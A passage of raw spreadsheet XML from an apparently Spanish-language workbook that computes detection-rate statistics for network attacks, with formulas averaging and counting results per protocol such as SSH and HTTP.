        <v>12</v>
      </c>
      <c r="DG15" s="173">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH15" s="629" t="s">
        <v>12</v>
      </c>
      <c r="DI15" s="607">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="DJ15" s="608" t="s">
        <v>12</v>
      </c>
      <c r="DK15" s="609">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL15" s="455" t="s">
        <v>12</v>
      </c>
      <c r="DM15" s="610"/>
      <c r="DN15" s="610"/>
      <c r="DO15" s="619" t="s">
        <v>427</v>
      </c>
      <c r="DP15" s="620">
        <f>DD15/'(D) - Análisis Resultados I - S'!EB34</f>
        <v>0.5</v>
      </c>
      <c r="DQ15" s="574"/>
      <c r="DR15" s="619" t="s">
        <v>427</v>
      </c>
      <c r="DS15" s="620">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="DT15" s="574"/>
      <c r="DU15" s="574"/>
      <c r="DV15" s="574"/>
      <c r="DW15" s="595" t="s">
        <v>2462</v>
      </c>
      <c r="DX15" s="596" t="s">
        <v>2478</v>
      </c>
      <c r="DY15" s="337">
        <f>1-(DD23/DE23)</f>
        <v>0</v>
      </c>
      <c r="DZ15" s="574"/>
      <c r="EC15" s="636" t="s">
        <v>2013</v>
      </c>
      <c r="ED15" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.05366134369</v>
      </c>
      <c r="EE15" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EF15" s="561" t="s">
        <v>12</v>
      </c>
      <c r="EG15" s="629" t="s">
        <v>12</v>
      </c>
      <c r="EH15" s="574"/>
      <c r="EI15" s="574"/>
      <c r="EJ15" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ7&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ7*'(B) - Detecciones - Ataques'!HN7/('(B) - Detecciones - Ataques'!HN7+'(B) - Detecciones - Ataques'!HO7),0)</f>
        <v>0</v>
      </c>
      <c r="EK15" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ7&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ7*'(B) - Detecciones - Ataques'!HO7/('(B) - Detecciones - Ataques'!HN7+'(B) - Detecciones - Ataques'!HO7),0)</f>
        <v>0</v>
      </c>
      <c r="EL15" s="574"/>
      <c r="EM15" s="622"/>
      <c r="EN15" s="574"/>
      <c r="EO15" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="EP15" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO15)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO15 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EQ15" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO15)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO15 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="ER15" s="623">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="ES15" s="401"/>
      <c r="ET15" s="402"/>
      <c r="EV15" s="574"/>
      <c r="EW15" s="20" t="s">
        <v>2669</v>
      </c>
      <c r="EX15" s="640">
        <f>1-EX12</f>
        <v>0.2954545455</v>
      </c>
      <c r="EY15" s="20"/>
      <c r="EZ15" s="641"/>
      <c r="FA15" s="574"/>
      <c r="FB15" s="574"/>
      <c r="FC15" s="574"/>
      <c r="FD15" s="574"/>
      <c r="FE15" s="574"/>
      <c r="FF15" s="574"/>
      <c r="FG15" s="574"/>
      <c r="FH15" s="574"/>
      <c r="FI15" s="574"/>
      <c r="FJ15" s="574"/>
      <c r="FK15" s="574"/>
      <c r="FN15" s="642" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSH")</f>
        <v>SSH</v>
      </c>
      <c r="FO15" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN15)</f>
        <v>0.8571428571</v>
      </c>
      <c r="FP15" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN15)</f>
        <v>0.9285714286</v>
      </c>
      <c r="FQ15" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN15)</f>
        <v>1</v>
      </c>
      <c r="FR15" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN15)</f>
        <v>7</v>
      </c>
      <c r="FS15" s="574"/>
      <c r="FT15" s="574"/>
      <c r="FU15" s="574"/>
      <c r="FV15" s="574"/>
      <c r="FW15" s="574"/>
      <c r="FX15" s="574"/>
    </row>
    <row r="16">
      <c r="D16" s="643">
        <f>SUM('(B) - Detecciones - Ataques'!HM3:HM139)</f>
        <v>1484</v>
      </c>
      <c r="E16" s="625">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HM3:HM139)</f>
        <v>1484</v>
      </c>
      <c r="G16" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="H16" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="I16" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="J16" s="316" t="s">
        <v>951</v>
      </c>
      <c r="K16" s="316" t="s">
        <v>633</v>
      </c>
      <c r="L16" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="M16" s="316" t="s">
        <v>244</v>
      </c>
      <c r="N16" s="316" t="s">
        <v>427</v>
      </c>
      <c r="O16" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="P16" s="316" t="s">
        <v>209</v>
      </c>
      <c r="Q16" s="316" t="s">
        <v>664</v>
      </c>
      <c r="R16" s="316" t="s">
        <v>357</v>
      </c>
      <c r="S16" s="316" t="s">
        <v>310</v>
      </c>
      <c r="T16" s="316" t="s">
        <v>292</v>
      </c>
      <c r="U16" s="317" t="s">
        <v>558</v>
      </c>
      <c r="W16" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="X16" s="318" t="s">
        <v>2108</v>
      </c>
      <c r="Y16" s="319" t="s">
        <v>2177</v>
      </c>
      <c r="Z16" s="318" t="s">
        <v>2193</v>
      </c>
      <c r="AA16" s="318" t="s">
        <v>2095</v>
      </c>
      <c r="AB16" s="318" t="s">
        <v>2074</v>
      </c>
      <c r="AC16" s="318" t="s">
        <v>2061</v>
      </c>
      <c r="AD16" s="318" t="s">
        <v>2015</v>
      </c>
      <c r="AE16" s="318" t="s">
        <v>953</v>
      </c>
      <c r="AF16" s="318" t="s">
        <v>1040</v>
      </c>
      <c r="AG16" s="318" t="s">
        <v>1012</v>
      </c>
      <c r="AH16" s="318" t="s">
        <v>1164</v>
      </c>
      <c r="AI16" s="318" t="s">
        <v>1848</v>
      </c>
      <c r="AJ16" s="318" t="s">
        <v>2300</v>
      </c>
      <c r="AK16" s="318" t="s">
        <v>1138</v>
      </c>
      <c r="AL16" s="318" t="s">
        <v>974</v>
      </c>
      <c r="AM16" s="318" t="s">
        <v>1108</v>
      </c>
      <c r="AN16" s="318" t="s">
        <v>1702</v>
      </c>
      <c r="AO16" s="318" t="s">
        <v>1626</v>
      </c>
      <c r="AP16" s="320" t="s">
        <v>636</v>
      </c>
      <c r="AQ16" s="318" t="s">
        <v>1726</v>
      </c>
      <c r="AR16" s="318" t="s">
        <v>822</v>
      </c>
      <c r="AS16" s="318" t="s">
        <v>445</v>
      </c>
      <c r="AT16" s="318" t="s">
        <v>1747</v>
      </c>
      <c r="AU16" s="318" t="s">
        <v>989</v>
      </c>
      <c r="AV16" s="318" t="s">
        <v>246</v>
      </c>
      <c r="AW16" s="318" t="s">
        <v>2242</v>
      </c>
      <c r="AX16" s="318" t="s">
        <v>1282</v>
      </c>
      <c r="AY16" s="318" t="s">
        <v>429</v>
      </c>
      <c r="AZ16" s="318" t="s">
        <v>912</v>
      </c>
      <c r="BA16" s="318" t="s">
        <v>1837</v>
      </c>
      <c r="BB16" s="318" t="s">
        <v>1510</v>
      </c>
      <c r="BC16" s="318" t="s">
        <v>1411</v>
      </c>
      <c r="BD16" s="318" t="s">
        <v>1397</v>
      </c>
      <c r="BE16" s="318" t="s">
        <v>1374</v>
      </c>
      <c r="BF16" s="318" t="s">
        <v>677</v>
      </c>
      <c r="BG16" s="318" t="s">
        <v>790</v>
      </c>
      <c r="BH16" s="318" t="s">
        <v>262</v>
      </c>
      <c r="BI16" s="318" t="s">
        <v>771</v>
      </c>
      <c r="BJ16" s="318" t="s">
        <v>724</v>
      </c>
      <c r="BK16" s="318" t="s">
        <v>211</v>
      </c>
      <c r="BL16" s="318" t="s">
        <v>805</v>
      </c>
      <c r="BM16" s="318" t="s">
        <v>932</v>
      </c>
      <c r="BN16" s="318" t="s">
        <v>1306</v>
      </c>
      <c r="BO16" s="318" t="s">
        <v>1903</v>
      </c>
      <c r="BP16" s="318" t="s">
        <v>2335</v>
      </c>
      <c r="BQ16" s="318" t="s">
        <v>1983</v>
      </c>
      <c r="BR16" s="318" t="s">
        <v>1999</v>
      </c>
      <c r="BS16" s="318" t="s">
        <v>1971</v>
      </c>
      <c r="BT16" s="318" t="s">
        <v>1201</v>
      </c>
      <c r="BU16" s="318" t="s">
        <v>750</v>
      </c>
      <c r="BV16" s="318" t="s">
        <v>666</v>
      </c>
      <c r="BW16" s="318" t="s">
        <v>892</v>
      </c>
      <c r="BX16" s="318" t="s">
        <v>1214</v>
      </c>
      <c r="BY16" s="318" t="s">
        <v>1293</v>
      </c>
      <c r="BZ16" s="318" t="s">
        <v>1331</v>
      </c>
      <c r="CA16" s="318" t="s">
        <v>2215</v>
      </c>
      <c r="CB16" s="318" t="s">
        <v>2261</v>
      </c>
      <c r="CC16" s="318" t="s">
        <v>359</v>
      </c>
      <c r="CD16" s="318" t="s">
        <v>1230</v>
      </c>
      <c r="CE16" s="318" t="s">
        <v>1812</v>
      </c>
      <c r="CF16" s="318" t="s">
        <v>1958</v>
      </c>
      <c r="CG16" s="318" t="s">
        <v>1667</v>
      </c>
      <c r="CH16" s="318" t="s">
        <v>505</v>
      </c>
      <c r="CI16" s="318" t="s">
        <v>312</v>
      </c>
      <c r="CJ16" s="318" t="s">
        <v>2289</v>
      </c>
      <c r="CK16" s="318" t="s">
        <v>411</v>
      </c>
      <c r="CL16" s="318" t="s">
        <v>1361</v>
      </c>
      <c r="CM16" s="318" t="s">
        <v>701</v>
      </c>
      <c r="CN16" s="318" t="s">
        <v>586</v>
      </c>
      <c r="CO16" s="318" t="s">
        <v>294</v>
      </c>
      <c r="CP16" s="318" t="s">
        <v>339</v>
      </c>
      <c r="CQ16" s="318" t="s">
        <v>370</v>
      </c>
      <c r="CR16" s="318" t="s">
        <v>394</v>
      </c>
      <c r="CS16" s="318" t="s">
        <v>1687</v>
      </c>
      <c r="CT16" s="318" t="s">
        <v>486</v>
      </c>
      <c r="CU16" s="318" t="s">
        <v>1889</v>
      </c>
      <c r="CV16" s="318" t="s">
        <v>1187</v>
      </c>
      <c r="CW16" s="318" t="s">
        <v>560</v>
      </c>
      <c r="CX16" s="318" t="s">
        <v>1175</v>
      </c>
      <c r="CY16" s="321" t="s">
        <v>1926</v>
      </c>
      <c r="CZ16" s="403"/>
      <c r="DA16" s="403"/>
      <c r="DB16" s="403"/>
      <c r="DC16" s="638" t="s">
        <v>1373</v>
      </c>
      <c r="DD16" s="639">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>9</v>
      </c>
      <c r="DE16" s="618">
        <v>9.0</v>
      </c>
      <c r="DF16" s="336">
        <f t="shared" ref="DF16:DF17" si="16">DE16/DD16</f>
        <v>1</v>
      </c>
      <c r="DG16" s="173">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH16" s="337">
        <f t="shared" ref="DH16:DH17" si="17">1-DF16</f>
        <v>0</v>
      </c>
      <c r="DI16" s="607">
        <f t="shared" si="4"/>
        <v>9</v>
      </c>
      <c r="DJ16" s="608">
        <f t="shared" ref="DJ16:DJ17" si="18">DI16/DD16</f>
        <v>1</v>
      </c>
      <c r="DK16" s="609">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL16" s="455">
        <f t="shared" ref="DL16:DL17" si="19">DK16/DD16</f>
        <v>0</v>
      </c>
      <c r="DM16" s="610"/>
      <c r="DN16" s="610"/>
      <c r="DO16" s="619" t="s">
        <v>1373</v>
      </c>
      <c r="DP16" s="620">
        <f>DD16/'(D) - Análisis Resultados I - S'!EB35</f>
        <v>0.5</v>
      </c>
      <c r="DQ16" s="403"/>
      <c r="DR16" s="619" t="s">
        <v>1373</v>
      </c>
      <c r="DS16" s="620">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="DT16" s="403"/>
      <c r="DU16" s="403"/>
      <c r="DV16" s="403"/>
      <c r="DW16" s="595" t="s">
        <v>2465</v>
      </c>
      <c r="DX16" s="613"/>
      <c r="DY16" s="614">
        <f>SQRT(DY14*(1-DY15))</f>
        <v>0.733409181</v>
      </c>
      <c r="DZ16" s="403"/>
      <c r="EC16" s="636" t="s">
        <v>951</v>
      </c>
      <c r="ED16" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>1</v>
      </c>
      <c r="EE16" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EF16" s="336">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.3333333333</v>
      </c>
      <c r="EG16" s="337">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.3333333333</v>
      </c>
      <c r="EH16" s="403"/>
      <c r="EI16" s="403"/>
      <c r="EJ16" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ8&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ8*'(B) - Detecciones - Ataques'!HN8/('(B) - Detecciones - Ataques'!HN8+'(B) - Detecciones - Ataques'!HO8),0)</f>
        <v>0.005988023952</v>
      </c>
      <c r="EK16" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ8&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ8*'(B) - Detecciones - Ataques'!HO8/('(B) - Detecciones - Ataques'!HN8+'(B) - Detecciones - Ataques'!HO8),0)</f>
        <v>0</v>
      </c>
      <c r="EL16" s="403"/>
      <c r="EM16" s="597"/>
      <c r="EN16" s="403"/>
      <c r="EO16" s="379" t="s">
        <v>244</v>
      </c>
      <c r="EP16" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO16)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO16 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EQ16" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO16)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO16 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="ER16" s="623">
        <f t="shared" si="13"/>
        <v>0.7142857143</v>
      </c>
      <c r="ES16" s="401"/>
      <c r="ET16" s="402"/>
      <c r="EV16" s="403"/>
      <c r="EW16" s="20" t="s">
        <v>2670</v>
      </c>
      <c r="EX16" s="336">
        <f>1-EX11</f>
        <v>0.4240004206</v>
      </c>
      <c r="FA16" s="403"/>
      <c r="FB16" s="403"/>
      <c r="FC16" s="403"/>
      <c r="FD16" s="403"/>
      <c r="FE16" s="403"/>
      <c r="FF16" s="403"/>
      <c r="FG16" s="403"/>
      <c r="FH16" s="403"/>
      <c r="FI16" s="403"/>
      <c r="FJ16" s="403"/>
      <c r="FK16" s="403"/>
      <c r="FN16" s="403" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"HTTP")</f>
        <v>HTTP</v>
      </c>
      <c r="FO16" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN16)</f>
        <v>0.5720504099</v>
      </c>
      <c r="FP16" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN16)</f>
        <v>0.6155286708</v>
      </c>
      <c r="FQ16" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN16)</f>
        <v>0.7826086957</v>
      </c>
      <c r="FR16" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN16)</f>
        <v>23</v>
      </c>
      <c r="FS16" s="403"/>
      <c r="FT16" s="403"/>
      <c r="FU16" s="403"/>
      <c r="FV16" s="403"/>
      <c r="FW16" s="403"/>
      <c r="FX16" s="403"/>
    </row>
    <row r="17">
      <c r="D17" s="173"/>
      <c r="E17" s="173"/>
      <c r="G17" s="644" t="s">
        <v>2671</v>
      </c>
      <c r="H17" s="645">
        <f t="shared" ref="H17:U17" si="14">H11/H10</f>
        <v>0.06785257776</v>
      </c>
      <c r="I17" s="645">
        <f t="shared" si="14"/>
        <v>0.05366134369</v>
      </c>
      <c r="J17" s="645">
        <f t="shared" si="14"/>
        <v>0.9919354839</v>
      </c>
      <c r="K17" s="645">
        <f t="shared" si="14"/>
        <v>0.8333333333</v>
      </c>
      <c r="L17" s="645">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="M17" s="645">
        <f t="shared" si="14"/>
        <v>0.7142857143</v>
      </c>
      <c r="N17" s="645">
        <f t="shared" si="14"/>
        <v>0.7142857143</v>
      </c>
      <c r="O17" s="645">
        <f t="shared" si="14"/>
        <v>0.0008261536646</v>
      </c>
      <c r="P17" s="645">
        <f t="shared" si="14"/>
        <v>0.1232876712</v>
      </c>
      <c r="Q17" s="645">
        <f t="shared" si="14"/>
        <v>0.7894736842</v>
      </c>
      <c r="R17" s="645">
        <f t="shared" si="14"/>
        <v>0.5714285714</v>
      </c>
      <c r="S17" s="645">
        <f t="shared" si="14"/>
        <v>0.00266295648</v>
      </c>
      <c r="T17" s="645">
        <f t="shared" si="14"/>
        <v>0.6666666667</v>
      </c>
      <c r="U17" s="646">
        <f t="shared" si="14"/>
        <v>0.2003484321</v>
      </c>
      <c r="W17" s="647" t="s">
        <v>2671</v>
      </c>
      <c r="X17" s="448">
        <f t="shared" ref="X17:CY17" si="15">IF(X10=0,"-",X11/X10)</f>
        <v>0.06777493606</v>
      </c>
      <c r="Y17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="Z17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AA17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AB17" s="448">
        <f t="shared" si="15"/>
        <v>0.05366134369</v>
      </c>
      <c r="AC17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="AD17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="AE17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="AF17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AG17" s="448">
        <f t="shared" si="15"/>
        <v>0.75</v>
      </c>
      <c r="AH17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="AI17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AJ17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AK17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AL17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="AM17" s="448">
        <f t="shared" si="15"/>
        <v>0.8888888889</v>
      </c>
      <c r="AN17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="AO17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AP17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AQ17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="AR17" s="448">
        <f t="shared" si="15"/>
        <v>0.6666666667</v>
      </c>
      <c r="AS17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="AT17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AU17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AW17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AX17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AY17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AZ17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BA17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BB17" s="448">
        <f t="shared" si="15"/>
        <v>0.0009113001215</v>
      </c>
      <c r="BC17" s="448">
        <f t="shared" si="15"/>
        <v>0.0005791505792</v>
      </c>
      <c r="BD17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="BE17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="BF17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BG17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="BH17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="BI17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BJ17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="BK17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="BL17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BM17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="BN17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BO17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="BP17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
